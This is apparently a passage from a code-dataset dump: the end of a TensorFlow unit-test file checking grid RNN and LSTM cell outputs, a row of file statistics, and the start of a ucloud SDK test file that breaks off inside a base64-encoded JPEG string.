res = sess.run(
[g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.36617181, 0.36617181]])
self.assertAllClose(res[1], [[0.71053141, 0.71053141, 0.36617181,
0.36617181, 0.72320831, 0.80555487,
0.39102408, 0.42150158]])
res = sess.run([g, s], {x: np.array([[1., 1., 1.]]), m: res[1]})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.36703536, 0.36703536]])
self.assertAllClose(res[1], [[0.71200621, 0.71200621, 0.36703536,
0.36703536, 0.80941606, 0.87550586,
0.40108523, 0.42199609]])
def testGrid2BasicLSTMCellWithRelu(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.2)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 4])
cell = tf.contrib.grid_rnn.Grid2BasicLSTMCell(
2, tied=False, non_recurrent_fn=tf.nn.relu)
self.assertEqual(cell.state_size, 4)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 4))
self.assertAllClose(res[0], [[0.31667367, 0.31667367]])
self.assertAllClose(res[1],
[[0.29530135, 0.37520045, 0.17044567, 0.21292259]])
"""LSTMCell
"""
def testGrid2LSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 8])
cell = tf.contrib.grid_rnn.Grid2LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, 8)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 8))
sess.run([tf.global_variables_initializer()])
res = sess.run(
[g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.95686918, 0.95686918]])
self.assertAllClose(res[1], [[2.41515064, 2.41515064, 0.95686918,
0.95686918, 1.38917875, 1.49043763,
0.83884692, 0.86036491]])
def testGrid2LSTMCellTied(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 8])
cell = tf.contrib.grid_rnn.Grid2LSTMCell(
2, tied=True, use_peepholes=True)
self.assertEqual(cell.state_size, 8)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 8))
sess.run([tf.global_variables_initializer()])
res = sess.run(
[g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.95686918, 0.95686918]])
self.assertAllClose(res[1], [[2.41515064, 2.41515064, 0.95686918,
0.95686918, 1.38917875, 1.49043763,
0.83884692, 0.86036491]])
def testGrid2LSTMCellWithRelu(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 4])
cell = tf.contrib.grid_rnn.Grid2LSTMCell(
2, use_peepholes=True, non_recurrent_fn=tf.nn.relu)
self.assertEqual(cell.state_size, 4)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 4))
self.assertAllClose(res[0], [[2.1831727, 2.1831727]])
self.assertAllClose(res[1],
[[0.92270052, 1.02325559, 0.66159075, 0.70475441]])
"""RNNCell
"""
def testGrid2BasicRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([2, 2])
m = tf.zeros([2, 4])
cell = tf.contrib.grid_rnn.Grid2BasicRNNCell(2)
self.assertEqual(cell.state_size, 4)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (2, 2))
self.assertEqual(s.get_shape(), (2, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run(
[g, s], {x: np.array([[1., 1.], [2., 2.]]),
m: np.array([[0.1, 0.1, 0.1, 0.1], [0.2, 0.2, 0.2, 0.2]])})
self.assertEqual(res[0].shape, (2, 2))
self.assertEqual(res[1].shape, (2, 4))
self.assertAllClose(res[0], [[0.94685763, 0.94685763],
[0.99480951, 0.99480951]])
self.assertAllClose(res[1],
[[0.94685763, 0.94685763, 0.80049908, 0.80049908],
[0.99480951, 0.99480951, 0.97574311, 0.97574311]])
def testGrid2BasicRNNCellTied(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([2, 2])
m = tf.zeros([2, 4])
cell = tf.contrib.grid_rnn.Grid2BasicRNNCell(2, tied=True)
self.assertEqual(cell.state_size, 4)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (2, 2))
self.assertEqual(s.get_shape(), (2, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run(
[g, s], {x: np.array([[1., 1.], [2., 2.]]),
m: np.array([[0.1, 0.1, 0.1, 0.1], [0.2, 0.2, 0.2, 0.2]])})
self.assertEqual(res[0].shape, (2, 2))
self.assertEqual(res[1].shape, (2, 4))
self.assertAllClose(res[0], [[0.94685763, 0.94685763],
[0.99480951, 0.99480951]])
self.assertAllClose(res[1],
[[0.94685763, 0.94685763, 0.80049908, 0.80049908],
[0.99480951, 0.99480951, 0.97574311, 0.97574311]])
def testGrid2BasicRNNCellWithRelu(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
cell = tf.contrib.grid_rnn.Grid2BasicRNNCell(
2, non_recurrent_fn=tf.nn.relu)
self.assertEqual(cell.state_size, 2)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 2))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1.]]),
m: np.array([[0.1, 0.1]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 2))
self.assertAllClose(res[0], [[1.80049896, 1.80049896]])
self.assertAllClose(res[1], [[0.80049896, 0.80049896]])
"""1-LSTM
"""
def testGrid1LSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope(
'root', initializer=tf.constant_initializer(0.5)) as root_scope:
x = tf.zeros([1, 3])
m = tf.zeros([1, 4])
cell = tf.contrib.grid_rnn.Grid1LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, 4)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 4))
self.assertAllClose(res[0], [[0.91287315, 0.91287315]])
self.assertAllClose(res[1],
[[2.26285243, 2.26285243, 0.91287315, 0.91287315]])
root_scope.reuse_variables()
x2 = tf.zeros([0, 0])
g2, s2 = cell(x2, m)
self.assertEqual(g2.get_shape(), (1, 2))
self.assertEqual(s2.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g2, s2], {m: res[1]})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 4))
self.assertAllClose(res[0], [[0.9032144, 0.9032144]])
self.assertAllClose(res[1],
[[2.79966092, 2.79966092, 0.9032144, 0.9032144]])
g3, s3 = cell(x2, m)
self.assertEqual(g3.get_shape(), (1, 2))
self.assertEqual(s3.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g3, s3], {m: res[1]})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 4))
self.assertAllClose(res[0], [[0.92727238, 0.92727238]])
self.assertAllClose(res[1],
[[3.3529923, 3.3529923, 0.92727238, 0.92727238]])
"""3-LSTM
"""
def testGrid3LSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 12])
cell = tf.contrib.grid_rnn.Grid3LSTMCell(2, use_peepholes=True)
self.assertEqual(cell.state_size, 12)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 12))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7,
0.8, -0.1, -0.2, -0.3, -0.4]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 12))
self.assertAllClose(res[0], [[0.96892911, 0.96892911]])
self.assertAllClose(res[1], [[2.45227885, 2.45227885, 0.96892911,
0.96892911, 1.33592629, 1.4373529,
0.80867189, 0.83247656, 0.7317788,
0.63205892, 0.56548983, 0.50446129]])
"""Edge cases
"""
def testGridRNNEdgeCasesLikeRelu(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([3, 2])
m = tf.zeros([0, 0])
# this is equivalent to relu
cell = tf.contrib.grid_rnn.GridRNNCell(
num_units=2,
num_dims=1,
input_dims=0,
output_dims=0,
non_recurrent_dims=0,
non_recurrent_fn=tf.nn.relu)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (3, 2))
self.assertEqual(s.get_shape(), (0, 0))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., -1.], [-2, 1], [2, -1]])})
self.assertEqual(res[0].shape, (3, 2))
self.assertEqual(res[1].shape, (0, 0))
self.assertAllClose(res[0], [[0, 0], [0, 0], [0.5, 0.5]])
def testGridRNNEdgeCasesNoOutput(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 4])
# This cell produces no output
cell = tf.contrib.grid_rnn.GridRNNCell(
num_units=2,
num_dims=2,
input_dims=0,
output_dims=None,
non_recurrent_dims=0,
non_recurrent_fn=tf.nn.relu)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (0, 0))
self.assertEqual(s.get_shape(), (1, 4))
sess.run([tf.global_variables_initializer()])
res = sess.run([g, s], {x: np.array([[1., 1.]]),
m: np.array([[0.1, 0.1, 0.1, 0.1]])})
self.assertEqual(res[0].shape, (0, 0))
self.assertEqual(res[1].shape, (1, 4))
"""Test with tf.nn.rnn
"""
def testGrid2LSTMCellWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.grid_rnn.Grid2LSTMCell(num_units=num_units)
inputs = max_length * [
tf.placeholder(
tf.float32, shape=(batch_size, input_size))
]
outputs, state = tf.nn.rnn(cell, inputs, dtype=tf.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state.get_shape(), (batch_size, 8))
for out, inp in zip(outputs, inputs):
self.assertEqual(out.get_shape()[0], inp.get_shape()[0])
self.assertEqual(out.get_shape()[1], num_units)
self.assertEqual(out.dtype, inp.dtype)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for v in values:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid2LSTMCellReLUWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.grid_rnn.Grid2LSTMCell(
num_units=num_units, non_recurrent_fn=tf.nn.relu)
inputs = max_length * [
tf.placeholder(
tf.float32, shape=(batch_size, input_size))
]
outputs, state = tf.nn.rnn(cell, inputs, dtype=tf.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state.get_shape(), (batch_size, 4))
for out, inp in zip(outputs, inputs):
self.assertEqual(out.get_shape()[0], inp.get_shape()[0])
self.assertEqual(out.get_shape()[1], num_units)
self.assertEqual(out.dtype, inp.dtype)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for v in values:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid3LSTMCellReLUWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.grid_rnn.Grid3LSTMCell(
num_units=num_units, non_recurrent_fn=tf.nn.relu)
inputs = max_length * [
tf.placeholder(
tf.float32, shape=(batch_size, input_size))
]
outputs, state = tf.nn.rnn(cell, inputs, dtype=tf.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state.get_shape(), (batch_size, 8))
for out, inp in zip(outputs, inputs):
self.assertEqual(out.get_shape()[0], inp.get_shape()[0])
self.assertEqual(out.get_shape()[1], num_units)
self.assertEqual(out.dtype, inp.dtype)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for v in values:
self.assertTrue(np.all(np.isfinite(v)))
def testGrid1LSTMCellWithRNN(self):
batch_size = 3
input_size = 5
max_length = 6 # unrolled up to this length
num_units = 2
with tf.variable_scope('root', initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.grid_rnn.Grid1LSTMCell(num_units=num_units)
# for 1-LSTM, we only feed the first step
inputs = ([tf.placeholder(tf.float32, shape=(batch_size, input_size))]
+ (max_length - 1) * [tf.zeros([batch_size, input_size])])
outputs, state = tf.nn.rnn(cell, inputs, dtype=tf.float32)
self.assertEqual(len(outputs), len(inputs))
self.assertEqual(state.get_shape(), (batch_size, 4))
for out, inp in zip(outputs, inputs):
self.assertEqual(out.get_shape(), (3, num_units))
self.assertEqual(out.dtype, inp.dtype)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
input_value = np.ones((batch_size, input_size))
values = sess.run(outputs + [state], feed_dict={inputs[0]: input_value})
for v in values:
self.assertTrue(np.all(np.isfinite(v)))
if __name__ == '__main__':
tf.test.main()
| 39.314394
| 80
| 0.566577
| 2,844
| 20,758
| 4.034107
| 0.092827
| 0.125512
| 0.04881
| 0.024928
| 0.815131
| 0.788198
| 0.773207
| 0.767628
| 0.764926
| 0.753857
| 0
| 0.11984
| 0.26597
| 20,758
| 527
| 81
| 39.388994
| 0.63313
| 0.046681
| 0
| 0.722084
| 0
| 0
| 0.003867
| 0
| 0
| 0
| 0
| 0
| 0.325062
| 1
| 0.042184
| false
| 0
| 0.012407
| 0
| 0.057072
| 0.002481
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
400f21010f235eec921552746d701050fce3012b
| 490,849
|
py
|
Python
|
tests/test_services/test_set_4079.py
|
ucloud/ucloud-sdk-python2
|
90fb43198df73a78d64bbd98675dc7b302856057
|
[
"Apache-2.0"
] | 19
|
2019-05-15T13:41:58.000Z
|
2019-11-13T09:09:37.000Z
|
tests/test_services/test_set_4079.py
|
ucloud/ucloud-sdk-python2
|
90fb43198df73a78d64bbd98675dc7b302856057
|
[
"Apache-2.0"
] | 9
|
2019-07-24T08:31:33.000Z
|
2020-09-22T04:01:46.000Z
|
tests/test_services/test_set_4079.py
|
ucloud/ucloud-sdk-python2
|
90fb43198df73a78d64bbd98675dc7b302856057
|
[
"Apache-2.0"
] | 3
|
2019-06-18T00:22:07.000Z
|
2020-04-24T02:28:06.000Z
|
# -*- coding: utf-8 -*-
""" Code is generated by ucloud-model, DO NOT EDIT IT. """
import pytest
import logging
from ucloud.core import exc
from ucloud.testing import env, funcs, op, utest
logger = logging.getLogger(__name__)
scenario = utest.Scenario(4079)
@pytest.mark.skipif(env.is_ut(), reason=env.get_skip_reason())
def test_set_4079(client, variables):
scenario.initial(variables)
scenario.variables[
"file"
] = "data:image/jpeg;base64,/9j/4SRFRXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAQAAAAsgAAABABAgAJAAAAygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEBAgAIAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAABgDAABNSU5PTFRBIERJR0lUQUwgQ0FNRVJBICAgICAgICAgAE1JTk9MVEEgQ08uLExURAAAAAAAAAAAAERpTUFHRSBYAAAAAAAASAAAAAEAAABIAAAAAQAAAFYxMDAtMDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMjAwMjowODoxMiAxNjowNjo1OAAYAJqCBQABAAAAQgIAAJ2CBQABAAAASgIAACKIAwABAAAAAgAAACeIAwABAAAAZAAAAACQBwAEAAAAMDIxMAOQAgAUAAAAUgIAAASQAgAUAAAAZgIAAAGRBwAEAAAAAQIDAAKRBQABAAAAegIAAASSCgABAAAAggIAAAWSBQABAAAAigIAAAeSAwABAAAABQAAAAiSAwABAAAAAAAAAAmSAwABAAAAAAAAAAqSBQABAAAAkgIAAHySBwB4AgAAlAMAAIaSBwB9AAAAmgIAAACgBwAEAAAAMDEwMAGgAwABAAAAAQAAAAOgBAABAAAAAAUAAAKgBAABAAAAwAMAAAWgBAABAAAAdgMAAACjBwABAAAAAwAAAAGjBwABAAAAAQAAAAAAAAAKAAAApRsAABwAAAAKAAAAMjAwMjowODoxMiAxNjowNjo1OAAyMDAyOjA4OjEyIDE2OjA2OjU4AAQAAAABAAAAAAAAAAoAAAAeAAAACgAAADwAAAAKAAAAAAAAAAAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAABgCGkgMAAQAAAAYAAACGkgUAAQAAAGYDAACGkgUAAQAAAG4DAACGkgMAAQAAAAIAAACGkgQAAQAAAPQPAACGkgQAAQAAABAPAAAAAAAASAAAAAEAAABIAAAAAQAAAAIAAQACAAQAAABSOTgAAgAHAAQAAAAwMTAwAAAAABoAAAAHAAQAAABNTFQwAAIEAAMAAADSBAAAAQIDAAEAAAADAAAAAgIDAAEAAAAAAAAAAwIDAAEAAAAAAAAABAIFAAEAAADeBAAADgIDAAEAAAAAAAAADwIDAAEAAAAAAAAAEAIDAAEAAAAAAAAAEQIDAAEAAAAAAAAAEgIDAAEAAAAAAAAAEwIDAAEAAAAAAAAAFAIDAAEAAAAAAAAAFQIDAAEAAAAAAAAAFgIDAAEAAAAAAAAAFwIDAAEAAAAAAAAAGAIDAAEAAAAAAAAAGQIDAAEAAAAAAAAAGgIDAAEAAAAAAAAAGwIDAAEAAAAAAAAAHAIDAAEAAAAAAAAAHQIDAAEAAAAAAAAAHgIDAAEAAAAAAAAAHwIDAAEAAAAAAAAAAA4HACgAAADmBAAAAA8HAP4AAAAOBQAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAAAAUHJpbnRJTQAwMTAwAAAEAAEAFgAWAAIAAQAAAAABAQAAAAEBAAAAAAAAAAAAAAAAAAAAAAAAAAAFli4AAAAAAAVnAAAsngAABWcAACyeAAAAAAEAAAAL+gAdAdQBBAAAAAAAAAAAAAAAxREAAAAsLhYEAAAAAAAAAAAAAAAAGRwAADsADkIAAAAAAAAAAAAAAAAAAAAAAAAFhf/wdQAAAAAAAMUQNgAAAACZmZmZGWESMXV4iYoOExgUEhAWEgAAAIUADAAGAQCAUwABA4QAAAAPatX+aw5RAGIOgSNXAGQA0gwXDQb/////AQIQQAACAP8AQABAAAAAEAAAAAARERERAAJhAgBDAAAaHRseAAAAAAAAFDIPYQAAHyIbHh4hHyOHZUMh///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////Y/9sAxQALBwgKCAcLCgkKDAwLDRAbEhAPDxAhGBkUGycjKSknIyYlLDE/NSwuOy8lJjZKNztBQ0ZHRio0TVJMRFI/RUZDAQwMDBAOECASEiBDLSYtQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0MCDAwMEA4QIBISIEMtJi1DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ//EAaIAAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKCxAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx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